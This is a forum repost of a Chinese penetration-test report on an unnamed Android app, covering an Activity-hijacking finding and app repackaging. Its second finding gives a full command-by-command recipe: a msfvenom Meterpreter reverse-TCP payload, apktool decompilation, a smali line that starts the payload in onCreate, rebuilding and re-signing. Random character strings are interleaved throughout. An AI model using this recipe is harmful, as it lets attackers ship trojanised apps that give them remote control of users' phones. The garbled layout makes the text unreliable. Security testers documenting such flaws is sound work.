原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

9 u8 P+ X1 ^& v 3 M T" K V2 P1 T- v4 I
6 U$ V$ o$ }- Y% r " g; J* \$ U. L+ C* p' c! {& @ o

; P6 G P5 X/ m8 V; O 0 t+ q. f, A5 y8 e: c# E 文档编号： D0 h/ ~7 w: ^) u: T 4 m# \% ]- I* p3 y# V" T K

6 l: ?$ p. j+ u. c ' w! b5 f% ?; ]: O4 S 3 S' y5 n' `! x# E2 G, j, h3 J5 a $ @6 Z9 T; M! X

& \3 u4 c+ T: ~/ q9 t9 X3 p1 [* e* C9 f1 p+ t8 w / b2 A5 L( B) o. m) q8 k7 b4 l2 E. r0 q' b9 X! A/ E% ?( k2 i

" v0 R z! B9 G' }) F. c! \1 C( @# l# }0 S. a5 c6 T + w: `, o! Y& R( I : u. `, w, a% H4 v

" T& M B* C% d! N; u * l5 h3 G$ j" B, U& R ; a' M9 g9 \' c5 [, j7 k + F! |2 m6 h/ S B

u; n) w# y: b; X: s# P2 i- ?; x" U6 R) ^) v; T / X" l4 P: P7 Y5 A6 o$ r $ ]8 A( O6 T; A% s8 ~1 ~# R; ^

$ t5 T1 Y7 G) M7 d- i# a2 a8 r5 v) V8 B3 H' W% {+ r. d2 ] 某某某APP渗透测试 2 a* P6 h/ z3 [+ {: }- ^3 F4 p 4 F: f3 Q% C/ i2 q C# Z$ u5 {

- r8 H+ _* O! t( J5 f/ G6 Z6 @- z6 p& Z0 L 0 g3 E5 k8 Z/ p5 Y. d 2 E' g2 \- O. H: q7 ?$ _' B* e

4 J) z7 {) [, f% f 6 [9 h7 z# D$ Y" n0 V 0 F/ t8 ?. H, i3 p% ?" u. B. b0 I, [9 x' B/ m0 Y9 N& x

% p }5 a4 k$ n K \! u' M 1 _) D+ n' z: i, @4 n& v * T; Q% b! A# t + P2 D% l( ] H/ o S3 B$ b7 s

7 u) f- {0 O8 T9 w) H6 P) d/ W" O $ E* C4 t4 n' H$ M 7 n9 r% Y4 C9 I s0 f# r6 ? - Q1 F8 {+ Y4 I- ^

" T. y& A- `2 t l* |! J6 | V" {. m 技术报告 ! `% I4 d. T% I2 w/ \ % r3 a2 Y* b' T v4 B8 S3 h

9 Y: ^, b# K4 w% i9 @- y- S9 ~- |) y/ [6 ~& \3 }) M" j 6 l6 B" f( N) h( _ % l9 q# h0 m- J; |- C3 F) u

( B4 E$ y5 U8 ~$ | 2 _1 u8 u9 {* [4 q, ?) b $ z; n9 v8 i- j2 w 6 N/ L) f) p" g7 ~/ b

* u I$ z' L) E& H* | ; ?" J+ r0 H, Q. n9 z7 h$ y/ _8 R 8 q3 t( U5 v: K- t {* H1 g ) ]/ n+ m5 t+ T1 R/ w2 C3 r& {; Z1 j4 \

$ O5 V- i' W7 w- i7 z 1 m3 ~" r# L5 L 8 p' J" O9 Z- l% q8 f $ A* D$ G' s) H& O) a( e& Z

. j& N. T' O" H$ h% _, E * x7 S0 n! B& _2 p' c- f( d6 R0 h ! G2 h9 p1 {+ l. d) J2 f" d b$ K& Q$ g- o; @

" f4 E% [: V: K; w % q: X2 m! ]- Q) }1 |0 R& M7 Y( a " S5 O9 z" a1 f2 _6 G 5 c5 g# l: ^4 f, n8 D* s

5 |9 B( Z6 `; }7 c5 U, o ) |" |& I) ?: G9 G* |: r2 G- B $ o) {4 }( F3 o) y. p F( X# N : @& H5 {% ?4 F% |8 k0 k

8 \; r1 Y: D, ?4 V3 D1 \6 P1 r, L5 y! f& f9 Q) j 5 [* [ q1 h, p0 a5 I( T! I( S5 p* S$ z

/ ~' }: `6 o2 ]8 R7 V % H2 J0 J, z1 t7 b1 U' `4 @4 G4 Q( z , L' \: l7 x5 E. B: Q+ w# ? : _6 [- x% K# }2 k+ a

' h: S9 h- R$ l, K 9 d7 g$ |3 z9 b) \% f" K( G $ ~0 ?' Q4 q; P. ~ 9 X/ ^) D' W" E: s' N5 o

5 a1 G' z/ o) G6 E; A + }$ t3 |; P4 H2 F8 i! G8 a 0 |8 J: ?: k: G, s7 a7 _2 k1 d1 j; F6 ^$ t

6 n( V2 h6 e3 M% ^ 2 a* Y" m/ S: Q7 r9 \( s* n4 [9 A/ [# D0 J1 w9 E* W

7 k5 R7 y, v' P$ Y ' b4 V+ m: C5 l# _! Y 1 E" t+ l( \) ?0 G$ R: M : k2 J4 z. q. W' R- {

1 T& M. e& ~& `% k2 s# ^; p* D6 s+ W 8 f- V0 G' s t9 Y& J. ^ $ m9 G: Y4 u4 G ( _, ]) N0 W6 `5 w l6 @0 Y# ^

- I q- B2 u5 C% F% v 0 Z4 F7 u% W: W: N# C % C$ G$ ?# |- m( D , T& ^/ p# r3 T! }* t3 i

3 U' `2 o) K3 C! H; ]( s2 }! r1 F : c6 A& v( N, H! |) i, v( p + V. q0 M8 g5 K, W : Q# x) z2 r# ` z6 D- Y

p: J! B1 H3 v1 T& l' N r7 o2 K' I4 K% k$ @( X2 l: X , Y0 j! ~. J" V( V1 |- B) P . V9 g4 m: i, l' U7 a8 _

# R5 R% U4 x: B4 O8 M, F: r! Y9 k ) `$ t% u/ t \8 k 6 R8 u6 X: {7 B, ~& t$ C* V 7 I, V. b9 K: y1 ] O3 }6 b! ]

$ p0 ]/ O( B; |6 c% C9 l; n8 S ; T6 @6 i$ H! G0 ^ S 二〇二〇年 8 }) }, g4 i4 m( P! U- k O8 e3 q t1 p# A

_: X6 [ g" M: n6 L; l; ^ 4 u8 K: q9 h2 ~- I" N 目录 0 J( o6 s% _0 [4 z' G& ] / y5 ~! L6 T+ g* K3 l

' c0 P- p6 B3 ^3 M3 s+ M( @ 7 v& d D# c2 q. w h" h2 c! Z% H# U# ^7 p: y' Z5 s8 ^( I. h( i6 h/ l5 V

1 Y- _9 b. y+ X8 Y! H, s2 m ) `' V; M& x5 a. |) L% o- h: S 1 概述... 3 ( X" e6 [# [3 @2 e- N6 v8 ?% P+ A 3 d" h A* \' t% U2 c

7 ^, V7 ]+ S: j ! s" h3 O5 i; k3 { 1.2测试时间... 3 : I9 d& H ^+ A& a9 F" x! a% ] J$ e; \5 f2 H! L- Y; x* I

0 P! v+ F/ V8 h& B2 n . {$ A1 ]" ^- V0 D$ V7 }' I( ]/ Z 1.3测试对象... 3 5 D% Q3 @& C1 T' z/ x) y; m . H" i& o# H( c6 i) a) ]9 K" V

" m/ y# z* o* J2 I0 A2 G- ^8 l 4 k. M) u J' A) O4 u 1.4测试结果... 3 ( Y, l w9 b3 \9 Z2 B- G& S 3 h7 x" _$ {, W6 x( [

* }, X1 D& y: g1 I1 M ' n8 D( a' @1 g+ O' ?$ ]9 J# L 2 检测结果... 4 0 z. Y6 @. z( x0 Y : I$ C. l( C! K: V

* Y% |% l! W; ]$ f! v1 o1 f - c7 D/ H2 S* ~ 2.1 某某某... 4 7 `2 }7 }# t+ V l& M5 P6 I. t4 {+ R. i$ g# v* y5 J

. g# }! q5 W4 T' N2 w6 Y& `3 N8 [& g 2.1.1检测目标... 4 ! y( @8 Q. o- \8 c2 I5 O9 [& I- r |2 G

( B; E1 L0 t2 j" |# a" d+ {# R' s5 A, f 2.1.2检测结果... 4 + I3 Q8 \; ~ Q8 e5 }; l% U9 `" @+ g. W8 ]2 f

# Z+ {4 F" a% M. ~" d # l5 ?# ?! P3 \ 2.1.2.1. 4 1 r' p: i/ V f9 ^% A3 U& d 8 K- |9 L, B9 Q+ n% J& h

9 ?/ L. q* t; E7 F* ^! | $ o6 ?) ?1 z6 e. A 2.1.2.2. 6 ! l" _4 ~0 C1 k }$ J" p / e0 ~$ k$ |6 [: |4 d; T2 e" x2 c

+ w2 R# e! I3 H9 S% t5 q8 h% G! S) ~5 Z4 S9 X% } 7 y( p/ g8 a5 J5 E# B ! k" C# r1 _; S0 C9 Y& {9 `& D2 i

4 A+ w9 g/ v" B; Q" n" u 3 j& }! B5 t( g% T$ l* U 1 概述 / K7 z) ]3 F3 ]$ p. c " C7 Q, k$ z# }0 r" M- T

2 L; {# V" l/ }4 | ' S7 I1 M/ d2 [& Z0 K# D1 p& b 1.2测试时间 * h; E/ `. O) B& B* Z/ a t9 p" p' J) d5 F% a$ f8 J

+ ]; I9 I4 L4 ?9 i) i i8 h @ * T' g Y% N1 N' A * R/ W. ]/ n% y9 r. q T; R+ z 渗透测试时间 , h5 U/ C: p$ y1 u: o' V0 W% l 3 G/ j$ a1 H. [ ' U6 Y/ `+ X M+ G* T7 x2 ]( O& E, r6 S
: f c3 @) W, u1 T7 w + J0 P/ \8 G4 `/ F) \|, Y! k 7 E4 Q" Q7 o' h$ `1 z ' R& m8 y& p& v: l: h0 Y 起始时间 ! V8 {! v" \|7 [3 i) P9 ?4 t0 f6 o 2 w, l' w5 u) B# @/ o4 }4 G' ? ! l+ l" B: A; ^$ [ 2 G1 \- @$ n2 h. o5 C! }0 ~	' H+ q2 k7 { }+ H& T: x' y 4 _/ {! e$ ]: G: f: N# _ % ^. Z* `' ~0 j! p! L7 \|) \7 R" h 8 o! i Y, X. \|/ B 2020年4月6日 Z' \, \ v4 e/ G0 U# v # {) P+ S# d# t! L0 l! U# w# O 5 O; c9 P" z q3 e5 R7 _" _) I" Y
" l" J% x, `$ {& l) Q0 ` ( A; Y5 U' B* K4 R. U7 \ 5 F( }8 b+ w1 ?7 h o8 j- P/ R ; B( J. ]7 \|. [$ ~- A) y. { 结束时间 9 g# {3 I. E h" F1 c 1 Q' X! S& v4 L, P; z ( E' l, i! b4 e1 H9 \|4 u 0 G+ D8 \9 H0 T	6 o. u5 X2 n4 t% \|( c0 e8 g( X J6 r/ N* F" H1 u2 ` $ Y+ N) R7 O: L: Y: O & \|7 Z- B7 E" h- u% O$ y 2020年4月9日 / n0 x/ t) @) O / c& E0 ^ y- X 4 d1 U" n: A3 m' R3 J& E n & N; G) I! \|: z7 c0 F

0 M' I" T2 M9 y0 j+ ]8 D - k( T7 Z8 i w0 s 1.3测试对象 6 l8 B. W1 A4 v5 l( a3 [( L! z0 \5 f 6 B! Y. d1 z4 o b- A

; W% @1 S4 Q8 R8 j5 `! N3 l; J0 A: N6 t3 X+ c$ o+ o! e 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 7 F' e1 y5 O$ V- e/ U* O9 a- e _ & W2 I. y% e, m* S* |4 _/ A

F6 t# C) K3 S7 Y% N3 s8 f7 x* |( n + Q5 |2 u0 a3 l! H5 F& m/ Y 表1-1 检测对象 2 k: p1 r) C0 T8 q7 F5 L" x o# P6 X9 J; J: Q0 V

' X( K9 a5 c" z7 R$ \| ; ^. f7 f; p! S1 B9 R7 U+ G/ L W 5 z+ }3 O- d: V7 j/ {$ J+ N$ a( o/ b- X# \0 }: h- k 序号 3 k" L2 Z- z6 n$ K. @( M 1 B. G C6 T( z" m W * Z) }2 T' O: l* C4 `! a4 e' M+ r9 n / q0 y$ K# Y+ q0 S( ?	6 A3 w6 ~0 v! A" v4 J3 h 4 c0 ^$ l% E a6 B1 C' ]( ` 9 Y& v! X+ a. f: S @& C: \|# \& U8 P$ [ 测试对象 , m6 G; ^# w0 ^ 9 \|9 q/ P3 h; b( X+ \|) B $ X! ~- h5 `* l# }- @ + J& R4 C; h' U	8 [$ Z8 {9 J2 ?7 [. c3 Q" N" I* A ! j0 f; _# i/ ?7 _9 _/ {. U6 e / g+ A, q: X5 n4 ]5 v" V' ~ 6 F6 N* e! u# ]- K7 K! b6 X0 q5 X 测试地址 : ]4 k$ l% n+ u0 m 3 t8 w; `, ?; V( e& W$ e- U * z# P2 J' {- [6 \| 3 i2 o2 T3 J- P: S	9 X- O* M7 u5 n6 V3 k( l " h! t" B) C6 N1 d+ Q* ] # s7 @5 X" [2 \3 a, G, H* E+ r$ g. }5 ?" e- [9 z3 ~ 安全漏洞 + \|5 M1 _$ I4 Z9 U $ E8 z/ A+ }/ \|! F) }+ m L0 C3 G6 P4 b) E3 \|% b) A 7 w! [2 R1 B: k' f1 t, ]
?! Y& Z8 D' O0 p8 d Y3 q+ M, b3 {) O7 D 6 @7 E( C6 o( {$ D- D 0 A: u7 V. l. H3 q+ T 1 4 n f# p0 w( B/ t# r 7 _) P6 b {* g! g" f4 ` 8 B' S! c3 L6 J; O/ p% {( l# Z6 _0 L8 }. }4 p3 q) y	) ?5 ?/ [9 I B+ { 1 }2 b( V/ j& K ^ + r- e u7 t7 @5 K" J: G $ O3 j) U6 j, r$ C 某某某安卓APP 8 x# S, x y% c0 W1 O ; k% L! P4 r! V: U 4 z/ Q3 _1 ^# n _; u3 O 6 }' X& [ C( v+ @) {5 N	; M1 y* z) e$ E3 z) T / T% e) Q# b) c4 I" Z Q7 [* P4 C ( U$ q7 z d y) R9 i 0 m2 f6 k9 f) @6 `. w" e' K 0 l. c1 l# W1 K2 P/ D: Q4 {: l+ g% N ( h: V6 x9 {; L- D3 `/ _ ( y" c) N' t/ K2 r+ e	' \|% l, b* C" {/ k ; C* x7 _0 Z1 _, P/ B9 h/ V : p% P& U2 s" W8 t- Y- o 4 J; Z, [5 @9 n- ^0 j9 c m 2 . H0 m* @! k+ L6 _% p7 I# o& Z ; u) h* ? H% P8 Q/ ]. O$ r ; L V7 D1 O. [- v( F7 u 8 N2 V4 S! d6 @" z; g! ?

' u2 W* ? y4 g v, J% b9 k2 c. d9 z$ S & C& C: }: ]* ^7 c m# S6 n 1.4测试结果 ( b Y2 V7 s& t6 C" { ]; r # _( h2 L5 [ q% Q# |* m5 A

f. p/ b2 g0 `( Q7 A6 Q - H0 y1 S: H9 t3 z5 G" Y; x 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： ) ~, C1 w$ q) d1 r' r k ' g2 G4 ^6 l; C) t

5 P7 I7 T& `6 K# p & Q _. D. [( Y- `( Q! |$ H # J0 y4 S. d5 w3 v0 C6 n7 w6 `: L8 d7 T; L$ j U: x9 K

; s) S: t& n! S- v& a* w4 K" E7 b h 序号 ) t& n9 S6 f" o( @+ V * Y: J; j' [* O; p* d

# y8 ~5 W4 H5 j w1 f4 F, h $ D, S- `' ~. I6 w. u) U 系统名称 9 l$ v. ^" l! O4 p# q# f

; D, ?! A4 G, K1 d n9 ^6 Y & x& R# h* C6 i2 N 漏洞名称 6 x/ s+ n, g8 ]3 R 2 z T/ M* z! y# a9 v7 \, k" p

$ ]; `, ~ E- \3 y7 w1 h 8 Y' c8 a" e; } 漏洞危害 : O k2 K1 V* Q* {5 Y ) D. U/ @9 V) ~& o. A& k

: C( {8 t1 D& V # z. s7 K7 }; N: K/ } 修复结果 9 _4 w+ o& G. V* k( Q6 Y( a' q* \- e6 b0 `0 _) N- d

) j U5 f; g7 i' j 0 m1 u; z, t, `5 p4 P1 ~ 1 + [3 C, F% d8 S! @ 6 W5 m4 ^5 q2 D5 b" ]7 P, \

) O$ A- t2 O# `: p8 L5 R, [ , H; i; |0 r1 T/ W; r 某某某某某某APP : ]6 g- J6 [6 M) x8 F+ n, \ " r/ t) W* i# y/ E; G* }

" g' E: W* N# @- O$ p/ L$ d+ Y, X# _ 7 x5 G: F# q$ I6 D. u; Z9 Y, {- B Activity 劫持 1 q5 J* x7 w7 H) L 9 C. y; Z* Z0 y

2 t2 Y$ [' ~, o' Z+ y3 t# D$ s9 u" S- f+ a 3 J& \4 h2 n5 _ $ ~( j& _4 z, K' c" T: N' o

$ L0 k+ i( M' h! |+ c * r" T; C$ T- w; G 高 " g ], m2 E. Y5 D* J% P' }3 }4 t7 g& G6 |7 S, E

4 G+ t/ d( k; m" ~ ! P7 T N2 u+ C, s, x) L5 z7 h: c6 { 3 h/ F+ ?! W; {8 x( m0 Q, H G - L7 K. |6 I. [+ I, S, j

$ G8 b( C7 `2 `5 X4 S2 v0 N* c7 d 2 |! o. e! m8 P 2 3 b" p" M" \+ y! {4 G3 j2 A* Y1 W2 z. {& e. H0 [( y8 ^: M

7 \ p4 B, @) a+ v& D; [2 V6 ~ * z& S) b- w ~9 o- }4 q2 C 某某某某某某APP ( M1 s+ N; T& K9 D! C) _: o6 R! i6 ^: P9 {$ @

! \# b. v# x5 @* y$ R 7 M5 b6 G# I! P$ ]3 _ L) y7 U9 N# P 反编译二次打包捆绑木马、篡改APP代码 $ j1 r3 L3 b+ v" z8 h \0 r( v$ N. G6 _ Z* a3 |4 O

- {% J9 c( f- Z# s# V ; N" w' ?& {, Q 高 ; e# n$ @5 D6 Z3 G4 P : w0 S- _: y8 z9 V" {

2 u+ Q. Y7 e" o/ g* A/ V/ a$ g1 |* U4 P9 i" @% N4 A % r/ i4 ^) m( q; l& d! `6 o, X- p1 j4 n( V) W

) w: W$ M4 E* A1 ` 1 o9 W/ T+ r" |+ ] % a0 E: _' ?! h- m* L2 T( K9 `# U2 r9 E # C% p4 o/ [; @ d% V, s8 h' I

% s/ N3 O7 f/ b; d 9 X$ q/ J7 ]3 X% \) d 表1-2 测试结果 , c) ?2 b: R' b% u 7 k$ x8 p( Y, Y% u3 `8 }5 x

* l! n3 Z @/ f9 Z. t* p0 M( e- | E% O & P( |: Q3 q$ u' p7 [& g+ t8 y2 _ 8 z* ?' h3 e) [6 P) J/ V' ]' r

C* F H* s$ a. s7 _7 \7 q3 _' X2 X: S( y 2 检测结果 # \9 ]+ }) i1 o, [! V4 M " |9 }4 K) ?2 Y7 o/ C- h& e

, \! ]8 y. I; l" V9 ?9 {. c$ r2 `8 S V; q3 T8 W 2.1 某某某 $ v0 A, `8 ^6 n & t4 p0 X9 m0 g; k/ [4 e

8 i, G3 F- j1 n0 q# W+ T7 `& T+ z3 o1 \ 2.1.1检测目标 & Q2 h& P5 v. | 5 e! p! w$ w$ _- Y0 ^( Y$ a6 e

9 P* M2 w, y/ h5 m0 X! R2 n1 M; t: j; q! X 目标地址： 某某某某某某APP % P' K- e8 g. n2 R ( c/ G% X1 p C1 z0 s

% s( _6 |: m- k6 S 3 Q! `2 {+ u! {- j 2.1.2检测结果 ! ^% p" h5 J' d1 }- U# o$ g2 s. T( o- f! Z% S9 g! H1 I! C

8 y: T9 Q5 V- Z- } * f: `& \* ?/ I) q 2.1.2.1 7 W3 Z9 h0 H5 x8 v5 B# | " _" W6 L1 }& E# X! K S3 v

- @" \6 o. j; H& _ 1 h7 q5 z7 o! D# a 漏洞链接地址：某某某某某某APP " j# e0 `1 G V: v" G' `3 J9 O2 c7 r( L, B0 c8 I- u6 z

7 `9 v4 F+ N1 K0 y6 d/ M - B4 c4 T' f/ s/ a7 W; C5 E7 R 4 z( Y* R* v d# j; E8 x & h3 _; y. O+ O5 d

1 O7 A2 |# n6 Y: O+ _2 b & T0 x; [& l' l; G) y+ v- k! T 漏洞分析及取证： 2 o: ~7 g9 R. i ]3 L 8 L- Q0 H) i/ }

1 x& ^" u$ _" N! x! X7 ~3 W . W' |7 v! j, M, ~8 t% k) x 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： / ~ N- z* P: u- Y# p/ H $ E8 P t. i5 h$ g

4 [" E: H1 b) O9 @6 t2 @% R5 I& W: t + k. `" ^+ g% h4 G 5 ^; |" H* N3 o* u: n0 l, O / E m& s) o; E& S/ a7 v

" o! {2 a. h& R! Y( [/ k' p / i. x; }; v. C9 V+ _; n 8 g, \) h) N5 U' U3 a 7 F$ l0 v1 b4 v1 m- @5 Q6 y: [

; y# w$ j3 p# b6 K: x* k, T4 P4 ]2 c% k8 W% Z" n , \4 B1 H7 t0 W9 ^. w0 M+ H ( m2 X/ z1 x$ d# }0 S- o

7 a4 M- U2 w% M% w* P7 }6 O( F3 G# N0 G" z % J1 W# |) c1 I : b; T! n! O7 v1 w2 {3 W8 I

$ ^0 Z) t! {5 E! q% a! d & Z; O. o& p6 q9 o9 j; ?% {7 v) h * i$ [! k% a: B, R% V 8 e# \$ I5 I7 R7 @/ O7 D* g" ~ x

& a. _3 L5 Z! j' t8 B " A9 ^- W3 E# X2 ^+ ~4 U4 T 漏洞危害：高 & v* n; X* n, p 8 N* U' L: H6 p- u7 r8 Z. H

: w3 t0 S# f% \|) A* {! T" x5 s9 ~ 2 L& m# `/ h% a! K n 6 `; m2 P" z, ?. `; h( `& Z- n5 p# }0 g7 t8 C( _ 严重程度 8 g8 Y r+ v! b1 u: R+ u + R% M, W: x6 P/ d + H2 ]; V w# o) R) r* j6 P + W- n! c) P8 e3 R& Q+ K, `5 S	3 _- O' p; t6 l+ c 5 I1 T8 I2 S) G) z; Q . L3 j) I% q5 p W: b; F4 C ' m# l4 a: ^: K6 }/ k8 g( M 高 ; [7 m, y6 Y& K# m( t6 l$ _+ b$ A9 F/ x 8 ~$ i8 \|5 C g6 _) k+ V; ^# D) F" O3 k8 \$ u. [7 L	& V7 [" V; B; I" s9 g$ G; Z7 e ! ?% f6 r" \|! f5 s- u+ J ) G( B+ ?% X- u9 x : `3 A2 t0 J$ a9 I ■ & P" m# @0 D/ o D( c+ {# L( E9 J3 l 2 f3 D) G* Z* p6 q' I + m% g0 O; _2 L+ e+ _- V/ A; \* @ 3 P* R& _! \0 w6 u# C	2 F; X; g/ @- S4 C7 s( P# \| . Z: J) r) g: F ' Y: I. b. T- P2 V 0 v1 e% C& D3 o+ O 中 ! @ i4 w( E0 z4 p2 x4 J& Q: _* l' o B% g3 C2 e. o ( W* H" m; L, p& k0 w. U1 [- a+ d/ r- w" d0 }	; m# L2 z: d7 Y2 L" ]0 `& i ' y9 c0 t( \+ _) f7 x " m- ^# {! Q! @# }% s1 L9 L b ) t' p& X7 w; E, p1 x & B9 R- S3 B r4 \|, _% } Q2 d4 u# y% ]: D! x3 a % {- i9 ?' p P7 p/ V+ s) L ' f- G2 l+ M" F4 _& t, C: S; z4 c6 ~	. P% ^% ]6 y: \, }' @( O$ C 1 N6 y# d7 L2 _6 B3 B# ` ; X9 s' U; ~- b$ P+ c X & u: G3 w6 i9 f9 z" C9 O5 m+ T 低 - ~$ w9 Q3 Z# C8 y . g& c! F* V4 Y: s* X( T* r * X# O6 k R' A6 P( l; X H9 d- v1 G6 q0 U	4 I8 t. K: ^! A0 B; F8 P: U! z( L& @+ S$ O5 f : f" S* `4 r0 c- G5 B * x' L; ]2 u. z' \|! U* h & K4 T0 S5 p0 a! p$ @) Z 9 I) e; g+ a' B( q" \|4 R7 T 5 p& v; R' \7 I7 i& s; R1 j& R * Y8 g5 @9 J" W8 N

5 N0 j" p5 F) k. e3 |: D7 w4 V- g % E V2 V5 w: L$ P$ f, L + L+ u+ X% u: D! g2 ]7 C . q( g( W. f+ q7 v' u) K

7 Y0 y# U1 r* l- ? " p3 |, g; r) s# P- o 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 0 Q' [' T4 F' e4 h Z ~4 R. Z/ G' ~) C H

5 @9 }- q J3 ?/ G9 ~0 {% \' I& Z; M2 S$ B9 R 4 B9 b/ i) A7 p6 d* p& W0 i * D: f( R ~' v- i& y- U9 K: B: k

+ a" X1 T2 n5 `8 i8 w* r* {) R1 } ( {! h+ W1 M- L0 d1 }9 d * G3 X% b" U' {) s, |3 `; |7 U- v3 ^& o* l8 n c' E* e

& r) R0 @7 J: d; ` 0 {9 ~3 ~; G' W5 T- z 2.1.2.2 5 A0 ]' s8 c( v c5 f; Q * _: _6 a5 f8 T4 Y# x' A( {) c

\2 V) I! w- C) F/ k4 `/ c 0 a& q6 I3 x5 d- i 漏洞链接地址：某某某某某某APP $ {3 Y* c/ T. M# r+ S, e4 r% U % T6 t; K4 f2 l- }$ M! w$ z

1 K# O8 [6 h4 m3 c z# M & s! r3 ~1 s9 d8 o! r3 P1 H* V! ~ 漏洞分析及取证： 7 s( T- C& Y, F P. m: D4 X- W # x$ a9 x) E3 U) G. H

- G9 t( A' T! T; _! R 3 w* E- A0 H2 a2 q 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 8 H6 s! |% A% E5 V" s ; X) g' k3 D2 }* ?( {' a8 K! y

z6 F/ I* c# i' o7 I+ K0 D & ^1 v) h9 b+ e2 T( t0 b 用Metasploit 生成木马 apk ( J! \- W% \5 O/ L# ]- F6 q! M/ e$ F6 Y2 Y7 l

, G6 `2 e+ l! S. t+ d; ]9 o/ x9 K: `5 }6 |. v/ k5 U% I: S msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk # a# ?7 V4 f" b( z# c* ~" h% u# Y5 V q- w

; P) Z j \! h0 i- X% V) T" h. S ! a/ w) A# |' v; v+ }5 `6 { 反编译目标apk和木马apk % k( v5 x9 V, g8 ]" ^9 j: S+ n( I. U+ n) g

6 [; y5 L2 ~! [ 2 P% a# k" d- E apktool d target.apk
: T. d7 n/ W! S J1 Q J8 F$ }0 d0 k) y+ v- K apktool d cockhorse.apk - p" o, b$ I1 A; c) N3 R3 b4 B+ y5 b5 Y! `; b2 \! T6 L9 G

5 K" Z6 K: \ G# p ; o1 b5 ?; u& ]" {- O7 J 木马 apk 注入目标 apk 4 K9 D3 S. T* a5 |! p) {! t. c( y8 [6 J

1 }: w! U; }3 {1 U3 B) z8 U # H% ~$ `% l. m& @ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
/ J& v5 v1 J" Z0 z$ R0 a |) U& |4 X invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V - Y1 x: K, B) ~) b0 K ! K2 z0 Q- r* X% w0 R* Z# T, K

$ ?/ F+ u/ k* I! v9 R 5 u/ t- D0 R+ o4 r 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 ) J @1 @. v& {- ~" X( z ) s3 Y, u% ^. z& k0 c. h0 Y$ [

& z, G4 @7 W) o! B: [) L7 @ i, O. `5 w' F 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 1 h. i; N# x4 O+ R% V' x; O! t! _' ]. b I, Z4 y* H

6 r. J9 u- T v' n* \. |5 S: [: w7 b( O( K! k0 v 回编译生成最终 apk , b% z- o x" g % z7 h0 Z2 n; _# D. U/ X& l) b: q

: i4 `+ A$ W- ? & D2 K4 q6 u; L' R4 \ 重新打包 0 [2 G$ G9 G! C" b ) q2 g) p: @& O/ _! h

, W3 z5 t- u' `- N" R5 ]3 y, R. i" h! G' l V apktool b -o repackage.apk target_app_floder " Y% s _1 M9 V' d- I" k6 X6 r* u

/ c2 p9 @' U: o( @, k+ `: p1 P 3 ?/ `# U, L+ [( ~4 @* y0 [3 V( d+ D 创建签名文件，有的话可忽略此步骤 7 k) g, r& ?3 L( u$ Y # B* H4 {; @% z) B7 z5 i

& O% a9 i- ~: m8 H4 W9 r O ' E A8 N; M! I9 \3 R keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ' H- t, i$ c" Z3 a' q3 Z' f2 a ( R% v9 \9 o- K) {/ A- o

5 I: o2 Z0 W8 a9 i1 W$ g ! P( O; j" X5 s/ E3 K( Z7 O5 |& E e 签名，以下任选其一 5 t5 m, y1 C4 ] " k' h" B6 x1 g

7 P. I7 a: O3 y0 D6 [$ I* J ( }$ i# U7 |0 }* @ jarsigner 方式 + k6 s) P2 ]+ X) ]. ~( c8 v$ C1 B& T5 I1 h$ B) `" c9 [# a8 f7 Q

' a1 e; U& w3 N1 I7 z( @9 f7 V* Q. a2 ^5 B, N/ _8 }6 P jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 A. X- [, U& c# a4 n& i2 K ' H* x/ H* c' r4 f- E# E6 p: |) R

, J5 U r# ?' ~ ' Z/ }0 f' _* c& M, F/ f apksigner 方式 1 ?5 N/ r' J7 A) G 0 @. p& {2 O. B X/ y

" G3 x& o! A/ W: r3 Q, g6 I* O2 C. a2 l+ ~8 k6 x apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ! }1 I) G9 n* T! {* i4 h$ v( H. s, G& F' q0 V. C2 z( k

! u$ E2 \; s1 [. @% z x, b2 ? h3 q/ B2 N: R7 W 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 d6 o# M n/ R; H' S, C3 N

- C" K+ I; I" d4 z" Z & F$ _/ i; B# Z/ s8 Y. S- D 验证，以下任选其一 ! u8 X& Y) M2 h8 H' e$ u' `7 } ) ]$ Y& G' |- I1 f1 o# E! m

1 d0 g8 B2 u& L- j o! h3 Q% n 2 y+ o2 H9 E5 ]& }. X" Z jarsigner方式 5 ~0 [: t. ^( s 9 I; k9 Y7 \) i( b9 Z

# ^$ k5 j! H: u; E3 d5 N n5 i# y) }7 A( ~9 ~- u0 g3 m! X jarsigner -verify repackaged.apk # ]5 w& ?4 `- }% `* X/ F( _ - [: u( D0 @ ~+ R% d1 M3 @

; h- \3 j0 ^( g 2 P- _5 b& i) q, r! s2 n5 W4 w apksigner 方式 6 v& @; F, }& z. [1 n1 l * r6 X' h9 F* f( V! F7 u

* C5 H4 r# ~# L2 ]3 P% P: |: q0 k7 I3 e- q3 T2 G apksigner verify -v --print-certs repackaged.apk @) t2 H) d1 J/ g, h% ] 4 Y) Y' Y, E3 `$ R

& r* W9 w: W- p3 g8 x3 b( d/ c" |/ k$ w h keytool方式 8 L# X- P, D- z, Z 0 `7 }! C; \! Y! j; s

